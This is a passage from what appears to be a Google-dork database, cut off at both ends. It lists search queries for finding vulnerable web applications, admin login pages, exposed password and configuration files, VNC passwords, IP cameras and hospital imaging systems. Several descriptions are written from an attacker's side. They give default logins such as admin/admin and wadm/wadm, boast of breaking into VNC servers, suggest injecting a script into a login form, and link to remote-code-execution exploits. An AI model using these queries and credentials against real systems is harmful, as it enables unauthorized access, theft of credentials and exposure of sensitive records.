No further details have been provided.<br> <br> Solution Description<br> <br> Currently, there are no known upgrades, patches, or workarounds available to correct this issue.<br> <br> Products:<br> <br> * SimpleMedia SimpleBBS 1.1 Affected<br> <br> Vulnerability classification:<br> <br> * Remote vulnerability<br> * Input manipulation attack<br> * Impact on integrity<br> * Exploit unavailable<br> * Verified<br> <br> More info on Vuln: http://www.securityfocus.com/bid/15594[descr]] [[url]http://www.google.com/search?q=intext%3A%22Powered+by+SimpleBBS+v1.1%22*&num=100[url]] [[dork]intext:"Powered by SimpleBBS v1.1"*[dork]] [end][1572]] [[start][1573] [[title]"Site powered By Limbo CMS"[title]] [[descr]this is the dork for Limbo Cms <= 1.0.4.2 _SERVER[] overwrite / remote code execution<br> <br> advisory & poc exploit:<br> <br> http://rgod.altervista.org/limbo1042_xpl.html[descr]] [[url]http://www.google.com/search?q=%22Site+powered+By+Limbo+CMS%22&hl=en&lr=&start=10&sa=N[url]] [[dork]"Site powered By Limbo CMS"[dork]] [end][1573]] [[start][1575] [[title]inurl:ventrilo_srv.ini adminpassword[[title]] [[descr]This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possibility of gaining control of the entire server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Aventrilo_srv.ini+adminpassword[url]] [[dork]inurl:ventrilo_srv.ini adminpassword[dork]] [end][1575]] [[start][1576] [[title]inurl:guestbook/guestbooklist.asp "Post Date" From Country[[title]] [[descr]An SQL vulnerability has been reported in a Techno Dreams asp script, login.asp. 
http://search.securityfocus.com/archive/1/414708/30/0/threaded<br> <br> Several ways of finding the vulnerable file:<br> Guestbook (the above dork): inurl:guestbook/guestbooklist.asp "Post Date" From Country<br> Results 1 - 21 of 123<br> Announcement: inurl:MainAnnounce1.asp "show all"<br> Results 1 - 20 of 86<br> WebDirectory: inurl:webdirectory "Total Available Web Sites" Search<br> Results 1 - 4 of 5<br> MailingList: inurl:maillinglist/emailsadd.asp<br> Results 1 - 6 of 6<br> <br> note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.<br> The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=inurl%3Aguestbook%2Fguestbooklist.asp+%22Post+Date%22+From+Country[url]] [[dork]inurl:guestbook/guestbooklist.asp "Post Date" From Country[dork]] [end][1576]] [[start][1577] [[title]inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net[[title]] [[descr]Miva Merchant is a product that helps businesses get into e-commerce. This dork locates their admin login.[descr]] [[url]http://www.google.com/search?q=inurl:/Merchant2/admin.mv+%7C+inurl:/Merchant2/admin.mvc+%7C+intitle:%22Miva+Merchant+Administration+Login%22+-inurl:cheap-malboro.net&num=100&hl=en&lr=&filter=0[url]] [[dork]inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net[dork]] [end][1577]] [[start][1578] [[title]intitle:"Admin login" "Web Site Administration" "Copyright"[title]] [[descr]Sift Group makes a web site administration product which can be accessed via a web browser. 
This dork locates their admin login.[descr]] [[url]http://www.google.com/search?q=intitle:%22Admin+login%22+%22Web+Site+Administration%22+%22Copyright%22+&num=100&hl=en&lr=&filter=0[url]] [[dork]intitle:"Admin login" "Web Site Administration" "Copyright" [dork]] [end][1578]] [[start][1579] [[title]intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net[[title]] [[descr]b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login.[descr]] [[url]http://www.google.com/search?q=intitle:%22b2evo+%3E+Login+form%22+%22Login+form.+You+must+log+in!+You+will+have+to+accept+cookies+in+order+to+log+in%22++-demo+-site:b2evolution.net&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net[dork]] [end][1579]] [[start][1580] [[title](intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob[[title]] [[descr]WebStatistica provides detailed statistics about a web page. 
Normally you would have to log in to view these statistics but the sites have put autologin on.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%28intitle%3AWebStatistica+inurl%3Amain.php%29+%7C+%28intitle%3A%22WebSTATISTICA+server%22%29+-inurl%3Astatsoft+-inurl%3Astatsoftsa+-inurl%3Astatsoftinc.com+-edu+-software+-rob_2926+-crack.ru+-edeco.cn[url]] [[dork](intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob_2926 -crack.ru -edeco.cn[dork]] [end][1580]] [[start][1581] [[title]inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl[[title]] [[descr]Information about proxy servers, internal ip addresses and other network sensitive stuff.<br> [descr]] [[url]http://www.google.com/search?q=inurl%3Aproxy+%7C+inurl%3Awpad+ext%3Apac+%7C+ext%3Adat+findproxyforurl[url]] [[dork]inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl[dork]] [end][1581]] [[start][1582] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1582]] [[start][1583] [[title]inurl:/cgi-bin/pass.txt[[title]] [[descr]Passwords[descr]] [[url]http://www.google.com/search?complete=1&hl=en&lr=&q=inurl%3A%2Fcgi-bin%2Fpass.txt[url]] [[dork]inurl:/cgi-bin/pass.txt[dork]] [end][1583]] [[start][1588] [[title]intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"[title]] [[descr]CubeCart is an eCommerce script written with PHP & MySQL. Search for vulnerable CubeCart 3.0.6 portals. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398<br> <br> Moderator note: "Moving milw0rm once again. This time hosted by asylum-networks.com. 
/str0ke"descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22Powered+by+CubeCart+3.0.6%22+intitle%3A%22Powered+by+CubeCart%22&btnG=Google+Search[url]] [[dork]intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"[dork]] [end][1588]] [[start][1589] [[title]"Emergisoft web applications are a part of our"[title]] [[descr]Hospital patient management system; in theory it could be dangerous.[descr]] [[url]http://www.google.com/search?q=%22Emergisoft+web+applications+are+a+part+of+our%22&hl=en&filter=0[url]] [[dork]"Emergisoft web applications are a part of our"[dork]] [end][1589]] [[start][1590] [[title]inurl:ovcgi/jovw[[title]] [[descr]An HP Java network management tool. It is a sign that a network may not be configured properly.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Aovcgi%2Fjovw[url]] [[dork]inurl:ovcgi/jovw[dork]] [end][1590]] [[start][1591] [[title]inurl:/img/vr.htm[[title]] [[descr]Linksys wireless G Camera.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fimg%2Fvr.htm[url]] [[dork]inurl:/img/vr.htm[dork]] [end][1591]] [[start][1592] [[title]intitle:Axis inurl:"/admin/admin.shtml"[title]] [[descr]Similar searches exist. This search finds a few more results as well as access to the Admin area or a login screen, depending on the camera's configuration.[descr]] [[url]http://www.google.com/search?q=intitle:Axis+inurl:%22/admin/admin.shtml%22&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:Axis inurl:"/admin/admin.shtml"[dork]] [end][1592]] [[start][1593] [[title]DCS inurl:"/web/login.asp"[title]] [[descr]Login pages for the DCS-950 Web Camera. Even comes with a built-in microphone.[descr]] [[url]http://www.google.com/search?q=DCS+inurl:%22/web/login.asp%22&hl=en&lr=lang_en&c2coff=1&filter=0[url]] [[dork]DCS inurl:"/web/login.asp"[dork]] [end][1593]] [[start][1596] [[title]intitle:"Dell Laser Printer *" port_0 -johnny.ihackstuff[[title]] [[descr]Dell laser printers. 
This search finds different results than dork id 1077.[descr]] [[url]http://www.google.com/search?hl=en&q=*+intitle%3A%22Dell+Laser+Printer+*%22+port_0+-johnny.ihackstuff[url]] [[dork]* intitle:"Dell Laser Printer *" port_0 -johnny.ihackstuff[dork]] [end][1596]] [[start][1597] [[title]filetype:bak createobject sa[[title]] [[descr]This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters "sa" (default SQL server admin id) and "createobject" which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use "server=127.0.0.1" so you know IIS & SQL Server are running on the same box.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=filetype%3Abak+createobject+sa[url]] [[dork]filetype:bak createobject sa[dork]] [end][1597]] [[start][1598] [[title]"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com[[title]] [[descr]betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins. [descr]] [[url]http://www.google.com/search?q=%22bp+blog+admin%22+intitle:login+%7C+intitle:admin+-site:johnny.ihackstuff.com&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com[dork]] [end][1598]] [[start][1599] [[title]inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"[title]] [[descr]This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The login portal can be found at /editor/login.asp. 
At time of submitting there are 21 results.<br> <br> Also a search for the logins:<br> inurl:"Results/editor/login.asp"<br> "Database Editor Login" "Results Page"descr]] [[url]http://www.google.com/search?q=inurl:%22editor/list.asp%22+%7C+inurl:%22database_editor.asp%22+%7C+inurl:%22login.asa%22+%22are+set%22&num=100&hl=en&lr=&filter=0[url]] [[dork]inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"[dork]] [end][1599]] [[start][1600] [[title]ext:passwd -intext:the -sample -example[[title]] [[descr]Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search.[descr]] [[url]http://www.google.com/search?q=ext:passwd+-intext:the+-sample+-example&filter=0[url]] [[dork]ext:passwd -intext:the -sample -example[dork]] [end][1600]] [[start][1601] [[title]enable password | secret "current configuration" -intext:the[[title]] [[descr]Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, "secret 5" and "password 7" passwords.[descr]] [[url]http://www.google.com/search?q=enable+password+%7C+secret+%22current+configuration%22+-intext%3Athe&filter=0[url]] [[dork]enable password | secret "current configuration" -intext:the[dork]] [end][1601]] [[start][1602] [[title]ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn[[title]] [[descr]Search for plaintext database credentials in ASA and BAK files.<br> [descr]] [[url]http://www.google.com/search?q=ext:asa+%7C+ext:bak+intext:uid+intext:pwd+-%22uid..pwd%22+database+%7C+server+%7C+dsn&filter=0[url]] [[dork]ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn[dork]] [end][1602]] [[start][1603] [[title]intext:"PhpGedView Version" intext:"final - index" -inurl:demo[[title]] [[descr]PHPGedView <=3.3.7 remote code execution<br> <br> advisory & poc exploit: <br> <br> http://rgod.altervista.org/phpgedview_337_xpl.html[descr]] 
[[url]http://www.google.com/search?q=intext:%22PhpGedView+Version%22+intext:%22final+-+index%22+-inurl:demo&hl=en&lr=&start=30&sa=N[url]] [[dork]intext:"PhpGedView Version" intext:"final - index" -inurl:demo[dork]] [end][1603]] [[start][1604] [[title]intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo[[title]] [[descr]DEV cms <=1.5 SQL injection <br> <br> advisory & poc exploit: <br> <br> http://rgod.altervista.org/dev_15_sql_xpl.html [descr]] [[url]http://www.google.com/search?hl=it&q=intext%3A%22Powered+by+DEV+web+management+system%22+-dev-wms.sourceforge.net+-demo&btnG=Cerca&lr=[url]] [[dork]intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo[dork]] [end][1604]] [[start][1605] [[title]intitle:"phpDocumentor web interface"[title]] [[descr]Php Documentor < = 1.3.0 rc4 remote code xctn <br> <br> dork: intitle:"phpDocumentor web interface"<br> <br> advisory & poc exploit:<br> <br> http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html[descr]] [[url]http://www.google.com/search?q=intitle:%22phpDocumentor+web+interface%22&hl=it&lr=&start=10&sa=N&filter=0[url]] [[dork]intitle:"phpDocumentor web interface"[dork]] [end][1605]] [[start][1606] [[title]inurl:"tmtrack.dll?"[title]] [[descr]This query shows installations of Serena Teamtrack. (www.serena.com).<br> <br> You may be able to adjust the application entry point, by providing a command after the "tmtrack.dll?" 
like this<br> <br> tmtrack.dll?LoginPage<br> tmtrack.dll?View&Template=view<br> and more.[descr]] [[url]http://www.google.com/search?q=inurl:%22tmtrack.dll%3F%22&hl=de&lr=&start=0&sa=N[url]] [[dork]inurl:"tmtrack.dll?"[dork]] [end][1606]] [[start][1607] [[title]"intitle:3300 Integrated Communications Platform" inurl:main.htm[[title]] [[descr]logon portal to the mitel 330 integrated communications platform.<br> <br> [Mitel® 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ][descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22intitle%3A3300+Integrated+Communications+Platform%22+inurl%3Amain.htm&btnG=Google+Search[url]] [[dork]"intitle:3300 Integrated Communications Platform" inurl:main.htm[dork]] [end][1607]] [[start][1608] [[title]intitle:Ovislink inurl:private/login[[title]] [[descr]Ovislink vpn login page.[descr]] [[url]http://www.google.com/search?q=intitle%3AOvislink+inurl%3Aprivate%2Flogin+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]intitle:Ovislink inurl:private/login [dork]] [end][1608]] [[start][1609] [[title]intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi[[title]] [[descr]A variation on Jeffball55's original Intellinet Ip Camera.<br> This search finds several more web cams.<br> A suggested secondary search:<br> "Administrator Menu" "camera Name" "Location" "frame rate" intitle:network.camera -pdf<br> Thanks jeffball.<br> [descr]] 
[[url]http://www.google.com/search?q=intitle%3A%22%3A%3A%3A%3A%3A+INTELLINET+IP+Camera+Homepage+%3A%3A%3A%3A%3A%22+OR+inurl%3A%2Fmain_activex.asp+OR+inurl%3A%2Fmain_applet.cgi&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.m[url]] [[dork]intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi[dork]] [end][1609]] [[start][1610] [[title]filetype:pl intitle:"Ultraboard Setup"[title]] [[descr]Setup pages to the ultraboard system.[descr]] [[url]http://www.google.com/search?q=filetype%3Apl+intitle%3A%22Ultraboard+Setup%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]filetype:pl intitle:"Ultraboard Setup"[dork]] [end][1610]] [[start][1611] [[title]inurl:install.pl intext:"Reading path paramaters" -edu[[title]] [[descr]Excellent information for footholds. Everything from OS, to forum software, etc. Other exploits possible[descr]] [[url]http://www.google.com/search?q=inurl:install.pl+intext:%22Reading+path+paramaters%22+-edu&hl=en&hs=cFH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]inurl:install.pl intext:"Reading path paramaters" -edu[dork]] [end][1611]] [[start][1612] [[title]inurl:build.err[[title]] [[descr]General build error file. Can tell what modules are installed, the OS, the compiler, the language; in theory usernames and passwords could probably be found too.[descr]] [[url]http://www.google.com/search?q=inurl%3Abuild.err+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]inurl:build.err [dork]] [end][1612]] [[start][1613] [[title]intext:ViewCVS inurl:Settings.php[[title]] [[descr]CVS is software used to keep track of changes to websites. You can review all updates and previous files without actually logging into CVS. 
It is possible to see password files, directory structure, how often the website is updated, previous code, find exploits, etc.[descr]] [[url]http://www.google.com/search?q=intext%3AViewCVS+inurl%3ASettings.php+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]intext:ViewCVS inurl:Settings.php [dork]] [end][1613]] [[start][1614] [[title]"Powered by Midmart Messageboard" "Administrator Login"[title]] [[descr]Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in a few minutes. Many other features included. Rar found it, murfie cleaned it up.[descr]] [[url]http://www.google.com/search?q=%22Powered+by+Midmart+Messageboard%22+%22Administrator+Login%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]"Powered by Midmart Messageboard" "Administrator Login"[dork]] [end][1614]] [[start][1615] [[title]inurl:install.pl intitle:GTchat[[title]] [[descr]Gtchat install file.<br> You can disable the chat program or change the language without an admin username or password. You can also point the chatroom information to a different URL, in theory using a crosscript to take over the chatroom.[descr]] [[url]http://www.google.com/search?q=inurl:install.pl+intitle:GTchat+&hl=en&hs=yTH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]inurl:install.pl intitle:GTchat [dork]] [end][1615]] [[start][1616] [[title]inurl:rpSys.html[[title]] [[descr]Web configuration pages for various types of systems. Many of these systems are not password protected.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1616]] [[start][1617] [[title]intitle:"Horde :: My Portal" -"Tickets"[title]] [[descr]Hi<br> It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. 
also php shell :) and much more ...<br> <br> Edited by CP[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&rls=GBSA%2CGBSA%3A2006-05%2CGBSA%3Aen&q=intitle%3A%22Horde+%3A%3A+My+Portal%22+-%22%5BTickets%22&btnG=Search[url]] [[dork]intitle:"Horde :: My Portal" -"[Tickets"[dork]] [end][1617]] [[start][1618] [[title]filetype:reg reg +intext:”WINVNC3”[[title]] [[descr]This can be used to get encoded VNC passwords which can otherwise be obtained from the local registry and decoded by Cain & Abel. The query finds registry entries which can otherwise be found locally in:<br> \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or<br> \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password<br> <br> If you are a Cain & Abel user and have used this feature before, you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers.<br> <br> [descr]] [[url]http://www.google.com/search?hl=en&lr=lang_en&q=filetype%3Areg+reg+%2Bintext%3A%E2%80%9DWINVNC3%E2%80%9D&lr=lang_en[url]] [[dork]filetype:reg reg +intext:”WINVNC3”[dork]] [end][1618]] [[start][1619] [[title]"Please re-enter your password It must match exactly"[title]] [[descr]Invision Powerboard registration pages. Plain and simple.[descr]] [[url]http://www.google.com/search?ie=ISO-8859-1&q=%22Please+re-enter+your+password+It+must+match+exactly%22&btnG=Google+Search[url]] [[dork]"Please re-enter your password It must match exactly"[dork]] [end][1619]] [[start][1620] [[title]intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu[[title]] [[descr]The page to change admin passwords. 
Minor threat but the place to start an attack.[descr]] [[url]http://www.google.com/search?q=intext:%22Fill+out+the+form+below+completely+to+change+your+password+and+user+name.+If+new+username+is+left+blank,+your+old+one+will+be+assumed.%22+-edu+-gov+-mil&hl=en&lr=&start=180&sa=N&filter=0[url]] [[dork]intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu -gov -mil[dork]] [end][1620]] [[start][1621] [[title]inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"[title]] [[descr]gives tons of private forum configuration information.<br> examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and Apache versions, encrypted admin password.<br> Also Crazyboard has known vulnerabilities.[descr]] [[url]http://www.google.com/search?q=inurl:CrazyWWWBoard.cgi+intext:%22detailed+debugging+information%22&hl=en&lr=&start=10&sa=N&filter=0[url]] [[dork]inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"[dork]] [end][1621]] [[start][1622] [[title]inurl:/cgi-nmis/nmiscgi.pl -edu -us -gov[[title]] [[descr]Dashboard monitoring software. Status of websites, devices and servers online. No password required to browse the systems.[descr]] [[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3A%2Fcgi-nmis%2Fnmiscgi.pl+-edu+-us+-gov&btnG=Search[url]] [[dork]inurl:/cgi-nmis/nmiscgi.pl -edu -us -gov[dork]] [end][1622]] [[start][1623] [[title]intext:"Welcome to Taurus" "The Taurus Server Appliance" intitle:"The Taurus Server Appliance"[title]] [[descr]Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.<br> With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. <br> <br> Separate Admin and root password. 
Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manual hosted by the device, no password needed.[descr]] [[url]http://www.google.com/search?q=intext:%22Welcome+to+Taurus%22+%22The+Taurus+Server+Appliance%22+intitle:%22The+Taurus+Server+Appliance%22&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]intext:"Welcome to Taurus" "The Taurus Server Appliance" intitle:"The Taurus Server Appliance"[dork]] [end][1623]] [[start][1624] [[title]inurl:wl.exe inurl:?SS1= intext:"Operating system:" -edu -gov -mil[[title]] [[descr]List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods.[descr]] [[url]http://www.google.com/search?q=inurl:wl.exe+inurl:%3FSS1%3D+intext:%22Operating+system:%22+-edu+-gov+-mil&hl=en&lr=&start=90&sa=N&filter=0[url]] [[dork]inurl:wl.exe inurl:?SS1= intext:"Operating system:" -edu -gov -mil[dork]] [end][1624]] [[start][1625] [[title]inurl:setdo.cgi intext:"Set DO OK"[title]] [[descr]Dcs-2100 cameras<br> By removing "intext:Set DO OK" you will get more hits but they will require a login. 
Set DO OK is almost always admin access; you will need to go to the root of the URL to use the camera.[descr]] [[url]http://www.google.com/search?q=inurl:setdo.cgi+intext:%22Set+DO+OK%22&hl=en&hs=hLE&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]inurl:setdo.cgi intext:"Set DO OK"[dork]] [end][1625]] [[start][1634] [[title]intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1"[title]] [[descr]Find web app: 4Images = 1.7.1<br> This web app is vulnerable to remote code execution exploit.<br> The url of exploit is this: http://milw0rm.com/id.php?id=1533<br> <br> Good hacking<br> By HaVoC[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1634]] [[start][1636] [[title]"not for public release" -.edu -.gov -.mil[[title]] [[descr]if you search through lots of these then you find some really juicy things, there are files from police, airports, government companies, all kinds of stuff that is not meant to be seen by normal people.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22not+for+public+release%22+-.edu+-.gov+-.mil&btnG=Search[url]] [[dork]"not for public release" -.edu -.gov -.mil[dork]] [end][1636]] [[start][1637] [[title](intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")[[title]] [[descr]Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. 
Just send some info off to be logged.<br> <br> If exploited correctly, it could give you admin access to a network.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22metaframe+XP+Login%22%29%7C%28intitle%3A%22metaframe+Presentation+server+Login%22%29&btnG=Search[url]] [[dork](intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")[dork]] [end][1637]] [[start][1638] [[title]inurl:ids5web[[title]] [[descr]EasyAccess Web is an application to view radiological images online,<br> like in hospitals or universities.<br> Problem is the default administrative login: wadm/wadm<br> <br> Be able to watch sensitive data and images.<br> Very bad...[descr]] [[url]http://www.google.com/search?rls=en&q=inurl:ids5web&ie=utf-8&oe=utf-8[url]] [[dork]inurl:ids5web[dork]] [end][1638]] [[start][1647] [[title]filetype:sql "insert into" (pass|passwd|password)[[title]] [[descr]Looks for SQL dumps containing cleartext or encrypted passwords.<br> [descr]] [[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Asql+%22insert+into%22+%28pass%7Cpasswd%7Cpassword%29&btnG=Search[url]] [[dork]filetype:sql "insert into" (pass|passwd|password)[dork]] [end][1647]] [[start][1652] [[title]"Powered by Simplog"[title]] [[descr]Searches for Simplog, which has directory traversal and XSS vulnerabilities in versions <= 1.0.2 <br> <br> http://notlegal.ws/simplogsploit.txt<br> http://retrogod.altervista.org/simplog_092_incl_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+Simplog%22&btnG=Google+Search[url]] [[dork]"Powered by Simplog"[dork]] [end][1652]] [[start][1653] [[title]"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )[[title]] [[descr]Searches for scripts that let you upload files which you can then execute on the server.[descr]] 
[[url]http://www.google.com/search?hl=en&q=%22index+of+%2F%22+%28+upload.cfm+%7C+upload.asp+%7C+upload.php+%7C+upload.cgi+%7C+upload.jsp+%7C+upload.pl+%29&btnG=Google+Search[url]] [[dork]"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )[dork]] [end][1653]] [[start][1654] [[title]inurl:"/admin/configuration. php?" Mystore[[title]] [[descr]Simple Google inurl trick for osCommerce to find the open administrator page.<br> If no .htpassword is set for the admin folder of osCommerce, then of course you can change any setting in the shop, unless password security has been enabled on the admin console.<br> <br> <br> Despite a few demo pages, there are a few open admin pages for webshops.<br> A simple patch, if you are one, is to place a .htpassword file in the root of the admin folder.<br> <br> -- J.R.Middleton[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1654]] [[start][1655] [[title]"powered by sblog" +"version 0.7"[title]] [[descr]Please go here for a writeup on the vulnerability.<br> <br> HTML injection.<br> <br> http://www.securityfocus.com/bid/17044[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1655]] [[start][1656] [[title]intitle:" - Trend Micro Control Manager 3.0" intext:"User name"[title]] [[descr]This is the TMCM for Control Manager and most definitely should not be public. TMCM controls Trend Micro sub-products, such as Messaging AV and Server AV products. From here you could (if you were malicious and gained entry via the login portal) enable such features as OPS (Outbreak Prevention), where you can push a policy to your whole site to disable network ports in case of a virus outbreak. 
Imagine "a policy to disable ALL ports, company WIDE"<br> <br> You would also be able to gain server names and IP addresses.<br> <br> Currently, at the time of this post, only one result is returned.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1656]] [[start][1657] [[title]inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"[title]] [[descr]Ipswitch WhatsUp Monitoring 2005!<br> <br> This is a console for network monitoring; access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, and gain server information such as IP addresses.<br> <br> If the administrators have utilised WUG to its potential, they will have also made full infrastructure maps available. Access beyond the portal is gold information: you would have access to information and services as if you were an administrator.<br> <br> In addition, some of the links allow you to go beyond the portal as a guest user; this still allows reconnaissance of various servers and details of them, including where they are located physically.<br> <br> For anybody that is interested, the login portal has a SQL-based backend.[descr]] [[url]http://www.google.com/search?q=inurl:%22NmConsole/Login.asp%22+%7C+intitle:%22Login+-+Ipswitch+WhatsUp+Professional+2005%22+%7C+intext:%22Ipswitch+WhatsUp+Professional+2005+(SP1)%22+%22Ipswitch,+Inc%22+copyright+log+in+User+Name+password+%22Knowledge+Bas[url]] [[dork]inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc" copyright log in User Name password "Knowledge Bas[dork]] [end][1657]] [[start][1658] [[title]filetype:asp + "ODBC SQL"[title]] [[descr]This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages, including all data returned in the error. 
The information can range from simple data such as the table/row queried to the full database name etc.<br> <br> An attacker could take this information and use it to gain a foothold into the SQL server, and could use the information for an SQL injection attack.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&as_qdr=all&q=filetype%3Aasp++%2B+%22%5BODBC+SQL%22&btnG=Search[url]] [[dork]filetype:asp + "[ODBC SQL"[dork]] [end][1658]] [[start][1659] [[title](intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")[[title]] [[descr]Alter setup configuration files.<br> Add ?step=1[descr]] [[url]http://www.google.com/search?q=(intitle:%22WordPress+%E2%80%BA+Setup+Configuration+File%22)%7C(inurl:%22setup-config.php%3Fstep%3D%22)&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork](intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")[dork]] [end][1659]] [[start][1660] [[title]intitle:"Joomla - Web Installer"[title]] [[descr]Joomla! is a Content Management System (CMS) created by the same team that brought you the Mambo CMS. This dork finds the 